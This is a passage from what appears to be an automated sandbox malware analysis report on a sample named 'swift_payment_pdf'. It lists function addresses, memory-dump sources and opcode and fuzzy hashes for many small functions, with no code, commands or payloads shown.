                  • Instruction Fuzzy Hash: BD017C32204584DFE326C61EC948F267BECEB5575CF0944B1F905DBAD1D628DC40C661
                  Function 0134826B Relevance: .0, Instructions: 46COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 84932ff7d723beb828853507a063fc31c1c4f5084c342f86961e34e7c5973b3c
                  • Instruction ID: 6895f7164ed5987a1c3adb8eacc6213ad53cd954d08cdff23d9613735de03d03
                  • Opcode Fuzzy Hash: 84932ff7d723beb828853507a063fc31c1c4f5084c342f86961e34e7c5973b3c
                  • Instruction Fuzzy Hash: 1F01A276700519DFD714EFAEE8009AEBBF9FF80618B1540A9D901A7654EE30ED06C790
                  Function 013FEB50 Relevance: .0, Instructions: 46COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 572e13204aca1c1d6b42aeb26c3b8f997f3a6a27f06f1a516cbd14c33d3334e8
                  • Instruction ID: 0561e5e12fd6001fe94618181f333e0fc224b4375d768c3d2aa0d53f2e630c18
                  • Opcode Fuzzy Hash: 572e13204aca1c1d6b42aeb26c3b8f997f3a6a27f06f1a516cbd14c33d3334e8
                  • Instruction Fuzzy Hash: 2D01DFB1284615AFE331AF19D800B02BBA8AF55F54F12842EB3469B3A0C6B098418BA4
                  Function 01352582 Relevance: .0, Instructions: 45COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 52cf5e1b90a8e706cd76b627c587cb1bdfcf855aeec151c7b264a4dcc1543d75
                  • Instruction ID: c1ea592ace6544ccc21a864d03eb8c1b2ba8ce8eee8b9c0688c6bae475470310
                  • Opcode Fuzzy Hash: 52cf5e1b90a8e706cd76b627c587cb1bdfcf855aeec151c7b264a4dcc1543d75
                  • Instruction Fuzzy Hash: 7EF0F432641A10F7C7329B5ACC40F57BAADEB84FA8F118429BA0997640CA30ED01CAE0
                  Function 0137C073 Relevance: .0, Instructions: 43COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                  • Instruction ID: fe3933f8e4254aa831b3cd70b3a927363749df4a29675d849b5a01391221a4c2
                  • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                  • Instruction Fuzzy Hash: DBF0C2B2600A11ABD335CF4DDC40EA7FBEEDBD1A84F048128A519CB320EA31DD04CB90
                  Function 0142634F Relevance: .0, Instructions: 43COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6f4b650d5ae16f0a94383930dbfcf210b77c4282b73fd8b50bf5b4c184331ff9
                  • Instruction ID: 1d7b63d14daf1ced6aed4ab8b467577e47eba0e2a87c13d18065f95e6a0b8492
                  • Opcode Fuzzy Hash: 6f4b650d5ae16f0a94383930dbfcf210b77c4282b73fd8b50bf5b4c184331ff9
                  • Instruction Fuzzy Hash: F8012C71A10259AFDB04DFADD551AAEB7F8FF58304F10406AE905E7350D6749A018BA4
                  Function 0134C310 Relevance: .0, Instructions: 43COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                  • Instruction ID: 9f6f24588f97259003c56aa60f529fd5340b36151ffd9b7733dabfe0c06b2075
                  • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                  • Instruction Fuzzy Hash: 92F0F633247A239BD7735A9D4840B6BAAD98FD1A6CF1A1035F2099B605CA68ED0297D0
                  Function 0142625D Relevance: .0, Instructions: 43COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 62d2f208a6ccb9203a3e297153bf87ba9af641b723a9ed10024b427618ec44df
                  • Instruction ID: b862a6837bb544f8736ceff5921e2d835dc07fa796b69aea26e603de005474fc
                  • Opcode Fuzzy Hash: 62d2f208a6ccb9203a3e297153bf87ba9af641b723a9ed10024b427618ec44df
                  • Instruction Fuzzy Hash: 6F017C71A0021AAFCB04EFADD451AAEB7F8EF58304F10802AF905E7350D674AA018BA0
                  Function 014262D6 Relevance: .0, Instructions: 43COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 567d753a52d3b6c443fd7f960329c48001c67215b6eae5f2b59fce51723a22c8
                  • Instruction ID: 89f4eecea71f511901e31745bfe2d4826ae2404d904d928601a81f73024e0ddf
                  • Opcode Fuzzy Hash: 567d753a52d3b6c443fd7f960329c48001c67215b6eae5f2b59fce51723a22c8
                  • Instruction Fuzzy Hash: AF012171A00219AFDB04DFADD55199EB7F8EF58304F50805AE915E7390D6749D018BA4
                  Function 0138CA6F Relevance: .0, Instructions: 42COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                  • Instruction ID: 5fa876e6e09156c5f69466e9d597c423736bd658076a61101f232f51bfee13f7
                  • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                  • Instruction Fuzzy Hash: F601F432204689DBE322A71DC805F99FB9DFF51B5CF0880A9FA149BAA1D679CD01C324
                  Function 014261E5 Relevance: .0, Instructions: 41COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7beb36a2434da397c817ed88e4a2d5041708cd800502ce5e2587d9817984d61a
                  • Instruction ID: d95d853d5577de2a8aa34d02b935945b3e63cb7a2af1b3fa2d922d37e06b11f7
                  • Opcode Fuzzy Hash: 7beb36a2434da397c817ed88e4a2d5041708cd800502ce5e2587d9817984d61a
                  • Instruction Fuzzy Hash: 67017C71A00259ABCF00DFADD841AAEBBB8AF58314F14405AE901A7390D734EA02CBA5
                  Function 013D63C0 Relevance: .0, Instructions: 41COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                  • Instruction ID: e1ebfe9cedf8d27d20d54e364b66ec08c70ded3a1c562a3da7367c11b49b65f5
                  • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                  • Instruction Fuzzy Hash: 79F01DB320001DBFEF019F99DD81DEF7B7EEB592A8B104125FA11A2160D635DD21ABA0
                  Function 013DA4B0 Relevance: .0, Instructions: 40COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5ef2773ec3e12a1a8cc6e15033d889226699d42925a3c0396c45987329bd722c
                  • Instruction ID: 56ba13a03c518f2b449169ec25c270e50e4f4a67777b916e4ca7a6758b838253
                  • Opcode Fuzzy Hash: 5ef2773ec3e12a1a8cc6e15033d889226699d42925a3c0396c45987329bd722c
                  • Instruction Fuzzy Hash: 6E018536100209EBCF129F84E940EDA3F66FB4C668F068101FE186A220C736DA70EB81
                  Function 0134C0F0 Relevance: .0, Instructions: 39COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f1b1b03d38fec90233d6b8f24ea7dba7ca4742569eedba16c888368eeeea45ef
                  • Instruction ID: 89dc4696a0b2c568e9c49b7f0384ff6ffd002a9533f651df3b5a03f27c23df65
                  • Opcode Fuzzy Hash: f1b1b03d38fec90233d6b8f24ea7dba7ca4742569eedba16c888368eeeea45ef
                  • Instruction Fuzzy Hash: FFF024712052519BF350A61D9C02F2272DAFBD465CF25902AEB098B6D1E970EC01C394
                  Function 0138656A Relevance: .0, Instructions: 39COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9f176b161a4d2bffc64ca62d0840196aad1ac282335948e51b0b602489d1d953
                  • Instruction ID: d8c0bff1b47b24ae75343b8b6fb83acde636ac16e53017b3fdc7397ee1152761
                  • Opcode Fuzzy Hash: 9f176b161a4d2bffc64ca62d0840196aad1ac282335948e51b0b602489d1d953
                  • Instruction Fuzzy Hash: C401A9B0204785DFF723A76CCD59F263798BB50F4CF484154BA418B9D6D728D8028224
                  Function 013F437C Relevance: .0, Instructions: 37COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                  • Instruction ID: 4c73529b273ebd20c5db4fcb11b6273c35bc1c94aaf666e59ba96916fed21a09
                  • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                  • Instruction Fuzzy Hash: 57F0E935341A1347EB36AA2E9410B2BA6D5DF90944B05853E9705CB680EF20D810C780
                  Function 013DE872 Relevance: .0, Instructions: 36COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                  • Instruction ID: a4a4546d99e521cd72e72a0e88cd3b3ba6db3b5d109f2a5749bb33a4bacb7cd6
                  • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                  • Instruction Fuzzy Hash: BCF05E337116629BE7229A4EEC81F16BFACBFD5E64F190075B6089F664C760EC0187D0
                  Function 013DC89D Relevance: .0, Instructions: 36COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 61f952992a62ccd11bdb8b77aee41f0c41e9851b1bd3cac7d521fe63a6bcab48
                  • Instruction ID: 49c828d23846e812c424126450e0258d4ca69d5b051072ef29cdb8226ab74dbc
                  • Opcode Fuzzy Hash: 61f952992a62ccd11bdb8b77aee41f0c41e9851b1bd3cac7d521fe63a6bcab48
                  • Instruction Fuzzy Hash: EDF0A4716153449FC710EF6CC542E1ABBE8FF58714F40465EB898DB394E634E901C756
                  Function 01380854 Relevance: .0, Instructions: 35COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                  • Instruction ID: 56a2cd2dbcc246b895399172406d463f3562cbfd55f113a19ad36dbda266bca4
                  • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                  • Instruction Fuzzy Hash: D6F0B472610204AFE718EB25CC05F96BAEDEF98348F248078A545E7274FAB1ED41C655
                  Function 013DC912 Relevance: .0, Instructions: 34COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5be1634667e1baa5e8d90662748a2d1cd90256143212ffe7c86c28625a197f0a
                  • Instruction ID: 6dc96334eea9616960a630a5414d4476e93ff8cf99087b9bdfb2c6442ccc12aa
                  • Opcode Fuzzy Hash: 5be1634667e1baa5e8d90662748a2d1cd90256143212ffe7c86c28625a197f0a
                  • Instruction Fuzzy Hash: 89F0C270A1024DEFCB04EFA9D511A5EB7B4FF18304F008059B905EB385DA34EA01CB50
                  Function 013547FB Relevance: .0, Instructions: 33COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6d9679d0e6c1ca533b2b9fafaac58f3125dcc611831e675d5ddfc52252910560
                  • Instruction ID: 297461f1aa58e2b4a9d7b2e9e2d0af3f68eb530f32512715bc6c5a94a705fd91
                  • Opcode Fuzzy Hash: 6d9679d0e6c1ca533b2b9fafaac58f3125dcc611831e675d5ddfc52252910560
                  • Instruction Fuzzy Hash: E4F0F0319022E49FE7AA8B1CC804F617FC89B00E3CF08886ACD6D83502F725D8C0C600
                  Function 01410115 Relevance: .0, Instructions: 32COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2516a12490c3693df8e4472835e13e36a19a1e8a784adb06a520e5c9f1aa79e3
                  • Instruction ID: b528759104f076cc19619e8cdc98d8a4bc3c8cd74ae223ac0f3db0cc3153142b
                  • Opcode Fuzzy Hash: 2516a12490c3693df8e4472835e13e36a19a1e8a784adb06a520e5c9f1aa79e3
                  • Instruction Fuzzy Hash: 69F0273E4196C017CB336B2D64602D27B54A752010F0A145FD4A15733DC5BD88C3C320
                  Function 0138C5ED Relevance: .0, Instructions: 31COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4322326fb93daf86a1ad23b0a1cbd1e56e4f823b55077974e261ca1e78dee282
                  • Instruction ID: e7af87175570de73000f12d8d4f428b96b9547ccc847c3580399ac449072dbe5
                  • Opcode Fuzzy Hash: 4322326fb93daf86a1ad23b0a1cbd1e56e4f823b55077974e261ca1e78dee282
                  • Instruction Fuzzy Hash: BAF0EC715117A59FE722BB2CC148BA1BBE8EB807BCF0CB436D44687912C674F880CA70
                  Function 01392619 Relevance: .0, Instructions: 31COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                  • Instruction ID: 84cbb5935f17a9ccea4f7e7cbcb44a27711523b309acde2517c52a4bde902359
                  • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                  • Instruction Fuzzy Hash: 12E0D832300A012BEB11AE5D8CC4F47776EDFD2B28F04407DB5045F251C9E2DC19C2A4
                  Function 013E6030 Relevance: .0, Instructions: 29COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                  • Instruction ID: 11ead02120ae97eb1eee14f5c15848b08f5629e322b4d11aef4ac3e06d49e0e1
                  • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                  • Instruction Fuzzy Hash: ECF030B21083289FE3219F09D949F52BBFCEB15368F45C025E6099B5A1D37AEC40CBA4
                  Function 01350710 Relevance: .0, Instructions: 28COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                  • Instruction ID: afbbd38b5470d9ee17cd97358c9ff2eb7af58461551f2d50f93f802d477c2397
                  • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                  • Instruction Fuzzy Hash: B1F0E5392087459FDB1ACF2AD050ED57BA8FB51758F000065FC468B351D732E982CB54
                  Function 013849D0 Relevance: .0, Instructions: 28COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                  • Instruction ID: f4c3103ed15c15c2757898b9364115ff42abbd1bbd63cf70acd57f92f3479849
                  • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                  • Instruction Fuzzy Hash: 54E0923224434AEBE7213B598800B66B6A99BD07A4F154429E2448F950DB78DC40C798
                  Function 01424164 Relevance: .0, Instructions: 27COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c618cfa03723d7ee8ca9fd1dc0bb17dce9b260b7483daa990e5b986301915fa2
                  • Instruction ID: 57d40edd5663ed872173eac6a87bfbf6983f757848467a0ac9d0ac074ba134d7
                  • Opcode Fuzzy Hash: c618cfa03723d7ee8ca9fd1dc0bb17dce9b260b7483daa990e5b986301915fa2
                  • Instruction Fuzzy Hash: B8F0A031A255B14FE762D76CD248B6677E4EB10A34FAE0566D40087A6AC730DCC0C650
                  Function 013F678E Relevance: .0, Instructions: 27COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                  • Instruction ID: 96ebcec0942897cbb22c4ec54dc9bcfefd5e769674089818590611284edf93de
                  • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                  • Instruction Fuzzy Hash: 5BE0DF72A00210FBDB21A79A8D06F9ABEACDB90EA8F054068B700E7090E530DE04C690
                  Function 014208C0 Relevance: .0, Instructions: 25COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                  • Instruction ID: 2522b4742315d17ce66a330c4dbbddd2d1cc7a6ac36e67e8a423261b7878774f
                  • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                  • Instruction Fuzzy Hash: 4DE09B316403608BCB258A1EC144A53B7E8DFA5660FA5806FE90547722C2F1F8C2C6D0
                  Function 013525E0 Relevance: .0, Instructions: 23COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 3d430d7b5981f6307a29aaa136732464667ee08196178178820216ff84a6080f
                  • Instruction ID: 6f4cc60e720d6f2577fbd299ab41719625f331ec54d12d49de9d8253d2c3f29e
                  • Opcode Fuzzy Hash: 3d430d7b5981f6307a29aaa136732464667ee08196178178820216ff84a6080f
                  • Instruction Fuzzy Hash: B6E09232100A94ABC722BB2DDD02F8B77AAEB60778F014515B519571A4CA74A850C798
                  Function 0140A456 Relevance: .0, Instructions: 23COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                  • Instruction ID: be239d85fb4d919b5e17688c6d1e1da10ee74a94eca5b4ca2fffffacdada74bd
                  • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                  • Instruction Fuzzy Hash: C2E06D31010B11DBEB326B2ED808B577AE0AF50715F258839A09A025F0C7B49880CA40
                  Function 013D4000 Relevance: .0, Instructions: 22COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                  • Instruction ID: f2e3d37e3c9509ae9d7524dfed05997dcc48f8da00eed8b0ed8ffa6493f8accb
                  • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                  • Instruction Fuzzy Hash: 37E0C2353003059FE715CF19D084B62BBB6BFD5A14F28C068A9488F605EB32E842CB40
                  Function 0134823B Relevance: .0, Instructions: 21COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                  • Instruction ID: b4db76f4d94450e8ae96ecbd0e2b1d2deafdf0714afc16bb769019509a514f63
                  • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                  • Instruction Fuzzy Hash: 1AE08C31401A14EFDF322E59DC00F5276E9FB54B28F104869E085164A887B0B881DA44
                  Function 01352050 Relevance: .0, Instructions: 20COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d898971bd99017263d260cf3f2564fe2a01a0083a80a06f6bc945d3d9637c59c
                  • Instruction ID: ff70ce315fc61abf48ee9651e7d49c7600383d98839c4381ddeb0f8d388c1fef
                  • Opcode Fuzzy Hash: d898971bd99017263d260cf3f2564fe2a01a0083a80a06f6bc945d3d9637c59c
